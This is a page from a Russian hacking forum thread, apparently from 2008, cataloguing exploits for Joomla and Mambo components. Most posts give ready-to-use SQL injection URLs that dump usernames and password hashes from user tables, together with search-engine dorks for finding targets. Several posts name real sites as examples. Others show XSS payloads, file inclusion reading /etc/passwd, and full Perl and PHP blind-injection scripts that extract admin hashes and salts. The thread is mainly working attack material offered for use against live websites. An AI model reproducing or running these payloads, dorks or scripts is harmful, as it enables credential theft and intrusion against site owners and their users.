ANTICHAT
Страница 2 из 10 < 1 2 3 4 5 6 > Последняя »
Показывать 40 сообщений этой темы на одной странице

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Веб-уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов (https://forum.antichat.xyz/showthread.php?t=50600)

Solide Snake 12.02.2008 22:59
Joomla Component rapidrecipe <= 1.6.5 SQL Injection

SQL Injection

Код:
after user_id or catogry_id add exploit

-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
Для поиска:

Код:
allinurl: "com_rapidrecipe"user_id
allinurl: "com_rapidrecipe" category_id

Joomla Component pcchess <= 0.8 Remote SQL Injection

SQL Injection

Код:
index.php?option=com_pcchess&Itemid=S@BUN&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
Для поиска:

Код:
allinurl: com_pcchess "user_id"
allinurl: com_pcchess
(c)

l-l00K 12.02.2008 23:28
Нашел сам, проверил - вроде не боян
Limbo - Lite Mambo 1.0.4
SQL инъекция в модуле downloads, в параметре catid, сайты тех поддержки уязвимы:
Код:
http://limbo-cms.com.ru/index.php?option=downloads&catid=2700+union+select+1,concat_ws(0x3a,username,password),3+from+lc_users+--+
Код:
http://limboportal.com/index.php?option=downloads&catid=7%20and%20substring(version(),1,1)=3+--+

it's my 13.02.2008 07:48
Component Blog Calendar 1.2.4 Passiv XSS

inurl: index.php?option=com_blog_calendar
Инъекция:
Код:
index.php?option=com_blog_calendar&year=%22onmouseover=%22avascript:alert(document.coockie);%22%3E123%3C!--
http://courier.brestnet.com/index.php?option=com_blog_calendar&year=%22onmouseover=%22avascript:alert(document.coockie);%22%3E123%3C!--
Для того что бы выскочил алерт нужно навести курсор на бажную ссылку.

Component Board [версия неизвестна] Local Include

inurl: index.php?option=com_board
Инъекция:
Код:
index.php?option=com_board&bbs_id=notice&Itemid=99999999&requiredfile=
http://eng.pharmaceutical.co.kr/index.php?option=com_board&bbs_id=notice&Itemid=99999999&requiredfile=../../../../../../../../../../../../etc/passwd
По поводу компонента Board, не уверен правильно ли уязвимость назвал, но юзается на ура =)

(c) it's my

FraiDex 14.02.2008 10:02
Joomla Component xfaq 1.2 (aid) Remote SQL Injection Vulnerability


Код:
index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a,username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/*
(c)milw0rm.com

Solide Snake 14.02.2008 23:23
Joomla Component paxxgallery 0.2 (iid) SQL Injection

Exploit

Код:
AFTER userid ADD EXPLİOT(USERİD DEN SONRA EXPLOİT EKLE)

EXAMPLE=http:XXXXXX/index.php?option=com_paxxgallery&Itemid=85&gid=7&userid= EXPLOİT

EXPLOIT==

S@BUN&task=view&iid=-3333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C3%2Cconcat(username,0x3a,password)%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users
Для поиска

Код:
allinurl: com_paxxgallery "iid"
allinurl: com_paxxgallery "userid"

Joomla Component MCQuiz 0.9 Final (tid) SQL Injection

Exploit

Код:
ATTACKER CAN SEE PASSWORD AND USERNAME UNDER PAGE

EXAMPLE=www.xxxxx.com/index.php?option=com_mcquiz&task=user_tst_shw&Itemid=xxx&tid= [EXPLOİT]

EXPLOIT=1=

1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3a,password),0x3a/**/from/**/jos_users/*

EXPLOİT=2=

1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
Для поиска

Код:
allinurl: com_mcquiz "tid"
allinurl: com_mcquiz

Joomla Component Quiz <= 0.81 (tid) SQL Injection

Exploit

Код:
ALL PASSWORD AND USERNAME UNDER PAGE

EXAMPLE: AFTER tid add EXPLOİTS

www.xxxxxxxx.com/index.php?option=com_quiz&task=user_tst_shw&Itemid=xxx&tid= [EXPLOİT]

EXPLOIT=1=

1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/jos_users/*

EXPLOİT=2=

1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
Для поиска

Код:
allinurl: com_quiz"tid"
allinurl: com_quiz
(c)


Joomla Component mediaslide (albumnum) Blind SQL Injection

Код:
#!/usr/bin/perl
#inphex
#joomla com_mediaslide blind sql injection
use LWP::UserAgent;
use LWP::Simple;
use Switch;
use Digest::MD5 qw(md5 md5_hex md5_base64);
print "usage: $0 -h host.com -p /\n";
### use Getopt::Long; ###
$column = "username";
$table = "jos_users";
$regex = "preview_f2";
%cm_n_ = ("-h" => "host","-p" => "path","-c" => "column","-t" => "table","-r" => "regex");
$a = 0;
foreach  (@ARGV) {
        $a++;
        while (($k, $v) = each(%cm_n_)) {
                if ($_ eq $k) {
                        ${$v} = $ARGV[$a];
                }
        }
}

$i = 48;
$h = 1;
$f = 0;
$k = 0;
### Yeah,that's it... ###
while () {
    while ($i <= 90) {
               
            if(check($i,$h,1) == 1)
            {
                    syswrite STDOUT,lc(chr($i));
                    $h++;
                        $a_chr = $a_chr.chr($i);
            }
               
                $i++;
               
        }
        push(@ffs,length($a_chr));
        if (($#ffs -1) == $ffs) {
                &check_vuln();
                exit;
        }
        $i = 48;
       
}
#/

### :D ###
sub check($$$)
{
        $i = shift;
        $h = shift;
        $m = shift;

        switch ($m)
        {
                case 1 { $query = "%20AND%20SUBSTRING((SELECT%20".$column."%20FROM%20".$table."%20LIMIT%200,1),".$h.",1)=CHAR(".$i.")"; }
        }

        $ua = LWP::UserAgent->new;
        $url = "http://".$host.$path."index.php?option=com_mediaslide&act=contact&id=1&albumnum=1".$query."";
        $response = $ua->get($url);
        $content = $response->content;
        if($content =~ /$regex/) { return 0;} else { return 1 ;}
}
#/

sub check_vuln
{
       

        $content = get("http://".$host.$path."index.php?option=com_mediaslide&act=contact&id=1&albumnum=1%20AND%201=1");
        $content1 = get("http://".$host.$path."index.php?option=com_mediaslide&act=contact&id=1&albumnum=1%20AND%201=0");

        foreach $bb1 (split(/\n/,$content)) {
                $bb = $bb.$bb1;
        }

        foreach  $yy1 (split(/\n/,$content1)) {
                $yy = $yy.$yy1;
        }

        $f =  md5_hex($bb);
        $s = md5_hex($yy);

        if ($f eq $s) {
                print "\nprobably not vulnerable";    #could be that ads,texts etc.. change
                exit;
        } else { print "\nvulnerable..."; }
}

# milw0rm.com [2008-02-14]

FraiDex 15.02.2008 22:10
Mambo Component Quran <= 1.1 (surano) SQL Injection Vulnerability

Mambo
Код:
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+mos_users+limit+0,20--
Joomla
Код:
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+jos_users+limit+0,20--
allinurl:"com_quran"
inurl:"/index.php?option=com_quran"

(c)milw0rm.com

gibson 17.02.2008 03:30
Mambo Component Ricette 1.0 Remote SQL Injection Vulnerability

EXPLOIT
Цитата:
index.php?option=com_ricette&Itemid=S@BUN&func=det ail&id=-9999999/**/union/**/select/**/0,0,%20%20%200x3a,111,222,333,0,0,0,0,0,1,1,1,1,1, 1,1,1,1,0,0,concat(username,0x3a,password)/**/from/**/mos_users/
зы
Цитата:
allinurl: com_ricette
Цитата:
allinurl: "com_ricette"id
Auth S@BUN http://milw0rm.com/exploits/5133

gibson 17.02.2008 03:32
joomla SQL Injection(com_jooget)


EXPLOIT :
Цитата:
index.php?option=com_jooget&Itemid=S@BUN&task=deta il&id=-1/**/union/**/select/**/0,333,0x3a,333,222,222,222,111,111,111,0,0,0,0,0,0 ,0,0,1,1,2,2,concat(username,0x3a,password)/**/from/**/jos_users/*
зы
Цитата:
allinurl: id "com_jooget"
Цитата:
allinurl: detail "com_jooget"
Цитата:
allinurl: "com_jooget"

Auth S@BUN http://milw0rm.com/exploits/5132

it's my 19.02.2008 08:36
Component Portfolio 1.0 SQL Injection

inurl: index.php?option=com_portfolio
Инъекция:
Код:
index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+mos_users/*
http://www.inta.org/index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password  ),5,6,7,8,9,10,11,12+from+mos_users/*
(с) it's my http://milw0rm.com/exploits/5139

Joomla Component Artist

Код:
http://www.tremplin-avenir.com/index.php?option=com_artist&task=view_artist_file&artistId=-1+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16+from+jos_users/*
http://www.dymok.net/index.php?option=com_artist&task=show_artist&id=-1+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16+from+jos_users/*
http://www.aarte.net/index.php?option=com_artist&idgalery=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9+from+jos_users/*
Три разных уязвимых параметра

Solide Snake 19.02.2008 18:29
Joomla Component com_pccookbook (user_id) SQL Injection

SQL Injection

Код:
index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
Для поиска

Код:
allinurl: com_pccookbook
allinurl: viewuserrecipes
allinurl: "com_pccookbook"user_id

Joomla Component com_clasifier (cat_id) SQL Injection

SQL Injection

Код:
index.php?option=com_clasifier&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
Для поиска

Код:
allinurl: com_clasifier
allinurl: com_clasifier cat_id
(c)

fobofob 20.02.2008 16:25
Кoмпoнeнт соm_рhilаfоrm

уязвимый параметр fоrm_id

но работает не везде,в чем причина не разобрался

пример уязвимого сайта:

код:

httр://www.nехtрrоm.ru/index.рhр?орtiоn=соm_рhilаfоrm&Itеmid=5 &fоrm_id=1+uniоn+sеlесt+1,2,version(),4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36#&Itemid=5

it's my 26.02.2008 13:55
Component EasyBook 1.1 Active XSS

inurl: index.php?option=com_easybook
Инъекция:
Код:
При добавлении сообщения уязвимо поле "Ваш сайт:/Your Homepage:". вписываем: http://www.com/" onmouseover=javascript:alert(/XSS/);> и добавляем сообщение.
Пример: http://demo.easy-joomla.org/index.php?option=com_easybook&amp;Itemid=5
Никнейм Hi!, наводим курсор на ссылку

it's my 28.02.2008 07:47
Component Simpleboard 1.0.3 (catid) SQL Injection

inurl: index.php?option=com_simpleboard
Инъекция:
Код:
index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/*
http://www.uvageneration.com/index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/*
(c) it's my, Scipio, xcedz http://milw0rm.com/exploits/5195

~!DoK_tOR!~ 06.03.2008 18:44
Mambo Component com_Musica (id) Remote SQL Injection Vulnerability

SQL Injection

Код:
index.php?option=com_musica&Itemid=172&tasko=viewo &task=view2&id=-4214/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0+fro m%2F%2A%2A%2Fmos_users/*

milw0rm

~!DoK_tOR!~ 10.03.2008 20:24
Mambo Component eWriting 1.2.1 (cat) SQL Injection Vulnerability

SQL Injection


Joomla!

Код:
/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--
Mambo

Код:
/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+mos_users--

milw0rm

~!DoK_tOR!~ 11.03.2008 19:26
Joomla Component ProductShowcase <= 1.5 SQL Injection Vulnerability

SQL Injection

Код:
index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
milw0rm

ZAMUT 16.03.2008 00:10
Joomla 1.5.1

Active XSS

Edit Your Details -> Your Name: [XSS]

XSS
(Права администратора)
Active:
Article: [ New ] -> Title: [XSS]
Passive:
Filter:[XSS]
Код:
/administrator/index.php?option=com_menus&task=view&menutype=[XSS]
ZAMUT (c)

iddqd 18.03.2008 21:17
Joomla components com_guide "category" Remote SQL Injection

PoC:
Код:
index.php?option=com_guide&category=-999999/**/union/**/select/**/0,username,
password,3,4,5,6,7,8/**/from/**/jos_users/*
© The-0utl4w

~!DoK_tOR!~ 20.03.2008 21:41
Joomla Component Datsogallery 1.3.1 Remote SQL Injection Vulnerability

SQL Injection

index.php?option=com_datsogallery&func=detail&id=' Sql

Код:
union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8,9,0,1,2,3,4,5+from+jos_users/*
milw0rm

~!DoK_tOR!~ 28.03.2008 16:05
Joomla Component MyAlbum 1.0 (album) SQL Injection Vulnerability

SQL Injection

http://[target]/index.php?option=com_myalbum&album=[SQL]

Код:
-1+union+select+0,concat(username,char(32),password),2,3,4%20from%20jos_users/*

Joomla Component alphacontent <= 2.5.8 (id) SQL Injection Vulnerability

SQL Injection

Код:
index.php?option=com_alphacontent&section=6&cat=15&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),39/**/from/**/jos_users/*
DORK:

inurl: "com_alphacontent"
"AlphaContent 2.5.8 © 2005-2008 - visualclinic.fr"


milw0rm

z01b 03.04.2008 01:04
Online FlashQuiz 1.0.2 Remote File Inclusion Vulnerability

Сайт разработчика : www.elearningforce.biz

Сплоит : http://localhost/path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=[код]



(с) NoGe

иц май 15.04.2008 12:12
Joomla Пасивная XSS компонент Traxartist
Уязвимость:
index.php?option=com_traxartist&task=playSongex&id =1">[xss]
Пример:
Код:
http://www.xclusivetrax.com/index.php?option=com_traxartist&task=playSongex&id=1"><script>alert(document.coockie)</script>
found by it's my

Ded MustD!e 24.04.2008 14:39
Joomla Component FlippingBook 1.0.4 SQL Injection

DORK: inurl:com_flippingbook
Exploit:
Код:
/index.php?option=com_flippingbook&Itemid=28&book_id=null/**/union/**/select/**/null,concat(username,0x3e,password),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/jos_users/*
(c)cO2
milw0rm.com

Joomla Component Filiale v. 1.0.4 SQL Injection

DORK: inurl:com_filiale
Exploit:
Код:
/index.php?option=com_filiale&idFiliale=-5+union+select+1,password,3,4,username,6,7,8,9,10,11+from+jos_users
(c)Str0xo
milw0rm.com

Joomla Component Profiler <= 1.0.1 Blind SQL Injection

DORK: allinurl:com_comprofiler
Exploit:
Код:
/index.php?option=com_comprofiler&task=userProfile&user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*
(c)$hur!k'n
milw0rm.com

ZAMUT 27.04.2008 19:30
Joomla Component PaxxGallery Blind SQL Injection Exploit
"more than 1 row"

Vuln code:
PHP код:
.....
global $database;
$id $_POST["id"];
$gid $_POST["gid"];
if (isset($id)) {
..... 
Exploit:
Код:
#!/usr/bin/perl
use strict;
use LWP::Simple;
print "-+--[ Joomla Component PaxxGallery Blind SQL Injection Exploit ]--+-\n";
print "-+--                \"more than 1 row\"                          --+-\n";
print "-+--                                                            --+-\n";
print "-+--            Author: ZAMUT                                  --+-\n";
print "-+--            Vuln: gid=                                      --+-\n";
print "-+--            Dork: option=com_paxxgallery                    --+-\n";

# Example:
# Url_Part_1: http://www.morganomega.com/index.php?option=com_paxxgallery&Itemid=46&task=view&gid=7
# Url_Part_2: &iid=34

print "Url_Part_1:" ;
chomp(my $ur1=<STDIN>);
print "Url_Part_2:";
chomp(my $ur2=<STDIN>);
my $n=48;
my $i=1;
my $log= 1;
my ($content,$result) = undef;
my $request = 0;
while($log)
{
        $content = get($ur1.'+and+1=(select+1+from+jos_users+where+length(if(ascii(upper(substring((select+password+from+jos_users+where+id=62),'.$i.',1)))='.$n.',password,id))>4)/*'.$ur2);
        if($content =~ /Subquery returns more than 1 row/) {$result.=chr($n); $n=47; $i++;}
        elsif($i==33 || $content =~ /doesn\'t exist/) {$log = 0}
        else {$n++; if($n==58){$n=65} }
        $request++;
}
print "Administrator hash: ".$result."\n";
print "REQUEST: ".$request;
Dork: option=com_paxxgallery


ZAMUT (c)

~!DoK_tOR!~ 02.05.2008 17:10
Joomla Component Webhosting (catid) Blind SQL Injection Exploit

Exploit:

Код:
#!/usr/bin/perl
#eSploit Framework - Inphex
use Digest::MD5 qw(md5 md5_hex md5_base64);
use LWP::UserAgent;
use HTTP::Cookies;
use Switch;
$host_ = shift;
$path_ = shift;
$id_ = shift;
$non_find = shift; #choose anything thats inside the article of id
$column = "username"; #change if needet
$table = "jos_users"; #change if needet
$info{'info'} = {
 "author" => ["cO2,Inphex"],
 "name" => ["Joomla com_webhosting Blind SQL Injection"],
 "version" => [],
 "description" => ["This script will exploit a Blind SQL Injection Vulnerability in Joomla com_webhosting"],
 "options" =>
 {
  "agent" => "",
  "proxy" => "",
  "default_headers" => [
  ["key","value"]],
  "timeout" => 2,
  "cookie" =>   
  {
  "cookie" => ["key=value"],
  },
 },
 "sending_options" =>
 {
  "host" => $host_,
  "path" => $path_".index.php",         
      "port" => 80,               
  "method_a" => "SQL_INJECTION_BLIND",
  "attack" =>
  {
    "option" => ["get","option","com_webhosting"],
    "catid" => ["get","catid","".$id_."%20AND%20SUBSTRING((SELECT%20".$column."%20FROM%20".$table."%20LIMIT%200,1),\$h,1)=CHAR(\$i)"],
    "regex" => [[$non_find]],
 
  },
 },
};
&start($info{'info'},222);
open FH,">>ok.html";
print FH $return{222}{'content'};
sub start
{
 $a_ = shift;
 $id = shift;
 $get_dA = get_d_p_s("get");
 $post_dA = get_d_p_s("post");
 my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0);
 my $jj = 1;
 my $ii = 48;
    my $hh = 1;
 my $ppp = 0;
 my $s = shift;
 my $a = "";
 my $res_p = "";
 my $h = "";
 ($h_host_h_xdsjaop,$h_path_h_xdsjaop,$h_port_h_xdsjaop,$method_m) = ($a_->{'sending_options'}{'host'},$a_->{'sending_options'}{'path'},$a_->{'sending_options'}{'port'},$a_->{'sending_options'}{'method_a'});
 $ua = LWP::UserAgent->new;
 $ua->timeout($a_->{'options'}{'timeout'});
 if ($a_->{'options'}{'proxy'}) {
    $ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'});
 }
 $agent = $a_->{'options'}{'agent'} || "Mozilla/5.0";
 $ua->agent($agent);
 {                                               
  while (($k,$v) = each(%{$a_}))
  {
  if ($k ne "options" && $k ne "sending_options")
    {
    foreach $r (@{$a_->{$k}})
    {
    if ($a_->{$k}[0])
      {
      print $k.":".$a_->{$k}[0]."\n";
      }
    }
    }
  }

  foreach $j (@{$a_->{'options'}{'default_headers'}})
  { 
  $ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]);
  $m++;
  }
  if ($a_->{'options'}{'cookie'}{'cookie'}[0])
  {       
  $ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]);
  }
 
 }
 switch ($method_m)     
 {
  case "attack" { &attack();}
  case "SQL_INJECTION_BLIND" { &sql_injection_blind();}
  case "REMOTE_COMMAND_EXECUTION" { &attack();}
  case "REMOTE_CODE_EXECUTION" {&attack();}
  case "REMOTE_FILE_INCLUSION" { &attack();}
  case "LOCAL_FILE_INCLUSION" { &attack(); }
  else { &attack(); }
 }

 sub attack
 {
 
  if ($post_dA eq "") {
  $method = "get";
  } elsif ($post_dA ne "")
  {
  $method = "post";
  }
  if ($method eq "get") {
  $res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA);
  ${$a_}{$id}{'content'} = $res_p;
  foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
    {
    $res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
   
    while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
    {
    if (${$jj} ne "")
      {
      ${$a_}{$id}{'regex'}[$h] = ${$jj};
      }
      $jj++;
    }
    $h++;
    }
  } elsif ($method eq "post")
  {
  $res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA,"application/x-www-form-urlencoded",$post_dA);
 
  ${$a_}{$id}{'content'} = $res_p;
  foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
    {
    $res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
    while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
    {
    if (${$jj} ne "")
      {
      ${$a_}{$id}{'regex'}[$h] = ${$jj};
      }
      $jj++;
    }
    $h++;
    }
  }
 }
 sub sql_injection_blind
 {
  syswrite STDOUT,$column.":";
  while ()
  {
  while ($ii <= 90)
    {
    if(check($ii,$hh) == 1)
    {
    syswrite STDOUT,lc(chr($ii));
    $hh++;
    $chr = $chr.chr($ii);
    }
    $ii++;
  }
  push(@ffs,length($chr));
  if (($#ffs -1) == $ffs)
    {
    print "\nFinished/Error\n";
    exit;
    }
    $ii = 48;
  }
 }
 sub check($$)
 {
  $ii = shift;
  $hh = shift;
  if (get_d_p_s("post") ne "")
  {
  $method = "post";
  } else { $method = "get";}
  if ($method eq "get")
  {
  $ppp++;
  $query = modify($get_dA,$ii,$hh);
  $res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query);
  foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
    {
    if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
    {
    return 1;
    }
    else
    {
      return 0;
    }
    $h++;
  }
  } elsif ($method eq "post")
  {
  $ppp++;
  $query_g = modify($get_dA,$ii,$hh);
  $query_p = modify($post_dA,$ii,$hh);
 
  $res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query_g,"application/x-www-form-urlencoded",$query_p);
  foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
    {
    if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
    {
    return 1;
    }
    else
    {
      return 0;
    }
    $h++;
  }
  }
 }
    sub modify($$$)
 {
    $string = shift;
    $replace_by = shift;
    $replace_by1 = shift;
    if ($string !~/\$i/ && $string !~/\$h/) {
      print $string;
        } elsif ($string !~/\$i/)
  {
          $ff = substr($string,0,index($string,"\$h"));
            $ee =  substr($string,rindex($string,"\$h")+2);
            $string = $ff.$replace_by1.$ee;
            return $string;
  } elsif ($string !~/\$h/)
  {
        $f = substr($string,0,index($string,"\$i"));
        $e = substr($string,rindex($string,"\$i")+2);
        $string = $f.$replace_by.$e;
      return $string;
  } else
  {
      $f = substr($string,0,index($string,"\$i"));
        $e = substr($string,rindex($string,"\$i")+2);
        $string = $f.$replace_by.$e;
      $ff = substr($string,0,index($string,"\$h"));
        $ee =  substr($string,rindex($string,"\$h")+2);
        $string = $ff.$replace_by1.$ee;
      return $string;
  }
 }
 sub get_d_p_s
 {
  $g_d_p_s = shift;
  $post_data = "";
  $get_data = "";
  $header_data = "";
  %header_dA = ();
  while (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}}))
  {
  if ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "get")
    {
    $method = "get"; push(@get,$a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]);
    }
    elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "post")
    {
    $method = "post"; push(@post,$a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]);
    }
    elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "header")
    {
            $header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2];
    }
    $hp++;
  }
  $yy = $#get;
  while ($bb <= $#get)
  {
  $get_data .= $get[$yy]."&";
  $bb++;
  $yy--;
  }
  $l = $#post;
  while ($k <= $#post)
  {
 
  $post_data .= $post[$l]."&";
  $k++;
  $l--;
  }
  if ($g_d_p_s eq "get")
  {
 
  return $get_data;
  }
  elsif ($g_d_p_s eq "post")
  {
  return $post_data;
  } elsif ($g_d_p_s eq "header")
  {
  return %header_dA;
  }
 }
 sub get_data
 {
  $h_host_h_xdsjaop = shift;
  $h_path_h_xdsjaop = shift;
  %hash = get_d_p_s("header");
    while (($u,$c) = each(%hash))
  {
  $ua->default_headers->push_header($u => $c);
  }
  $req = $ua->get($h_host_h_xdsjaop.$h_path_h_xdsjaop);
  return $req->content;
 }
 sub post_data
 {
  $h_host_h_xdsjaop = shift;
  $h_path_h_xdsjaop = shift;
  $content_type = shift;
  $send = shift;
  %hash = get_d_p_s("header");
    while (($u,$c) = each(%hash))
  {
      $ua->default_headers->push_header($u => $c);
  }
  $req = HTTP::Request->new(POST => $h_host_h_xdsjaop.$h_path_h_xdsjaop);
  $req->content_type($content_type);
  $req->content($send);
  $res = $ua->request($req);
  return $res->content;
 }
}

# milw0rm.com [2008-05-01]
milw0rm

~!DoK_tOR!~ 11.05.2008 18:41
Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit

Код:
<?
//Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit by +toxa+
//Greets: all members of antichat.ru & cih.ms

//options
set_time_limit(0);
ignore_user_abort(1);
$norm_ua='Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14';
$url=$_GET['url'];
$where=(!empty($_GET['user']))?"where username='".$_GET['user']."'":'limit 0,1';
$id=(!empty($_GET['id']))?$_GET['id']:'1';

//functions
function send_xpl($url, $xpl){
        global $id;
        $u=parse_url($url);
        $req ="GET ".$u['path']."components/com_datsogallery/sub_votepic.php?id=$id&user_rating=1 HTTP/1.1\r\n";
        $req.="Host: ".$u['host']."\r\n";
        $req.="User-Agent: ".$xpl."\r\n";
        $req.="Connection: Close\r\n\r\n";
        $fs=fsockopen($u['host'], 80, $errno, $errstr, 30) or die("error: $errno - $errstr<br>\n");
        fwrite($fs, $req);
        $res=fread($fs, 4096); 
        fclose($fs);
        return $res;
}

function xpl($condition, $pos){
        global $norm_ua;
        global $where;
        $xpl=rand(1,100000)."'),(1,if(ascii(substring((select password from #__users $where),$pos,1))$condition,(select '$norm_ua'),(select link from #__menu)))/*";
        return $xpl;
}

//main
echo '<title>Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit by +toxa+</title>';
if(empty($url)) die($_SERVER['SCRIPT_NAME']."?url=[url]&user=[username]&id=[pic_id]\n<br>username&pic_id - optional\n");
send_xpl($url, $norm_ua);

//get md5
for($i=0;$i<=32;$i++){
        $buff=send_xpl($url,xpl('>58', $i));
        if(preg_match('/Duplicate entry/', $buff)){
                for($j=97;$j<=102;$j++){
                        if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
                }
        } elseif(preg_match('/Subquery returns more than 1 row/', $buff)){
                for($j=48;$j<=57;$j++){
                        if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
                }
        } else {
                die("exploit failed");
        }
}

//check Joomla version
$test=rand(1,100000)."'),(1,if((select length(password) from #__users $where)=32,(select '$norm_ua'),(select link from #__menu)))/*";
$buff=send_xpl($url,$test);
if(preg_match('/Duplicate entry/', $buff)) die($pass);

//separator
$pass.=':';

//get salt
for($i=33;$i<=49;$i++){
        $buff=send_xpl($url,xpl('>58', $i));
        if(preg_match('/Duplicate entry/', $buff)){
                $buff=send_xpl($url, xpl('>91',$i));
                if(preg_match('/Duplicate entry/', $buff)){
                        for($j=97;$j<=122;$j++){
                                if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
                        }
                } elseif(preg_match('/Subquery returns more than 1 row/', $buff)){
                        for($j=65;$j<=90;$j++){
                                if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
                        }
                } else {
                        die("exploit failed");
                }
        } elseif(preg_match('/Subquery returns more than 1 row/', $buff)){
                        for($j=48;$j<=57;$j++){
                                if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
                        }
        } else {
                die("exploit failed");
        }
}
echo $pass;

Author : +toxa+

Amoura 13.05.2008 01:00
Joomla Component xsstream-dm 0.01 Beta SQL Injection


Код:
#!/usr/bin/perl -w

#########################################################
# Joomla Component xsstream-dm 0.01 Beta Remote SQL Injection #
# download : http://sstreamtv.com/index.php?option=com_docman&task=doc_details&gid=24
#########################################################

########################################
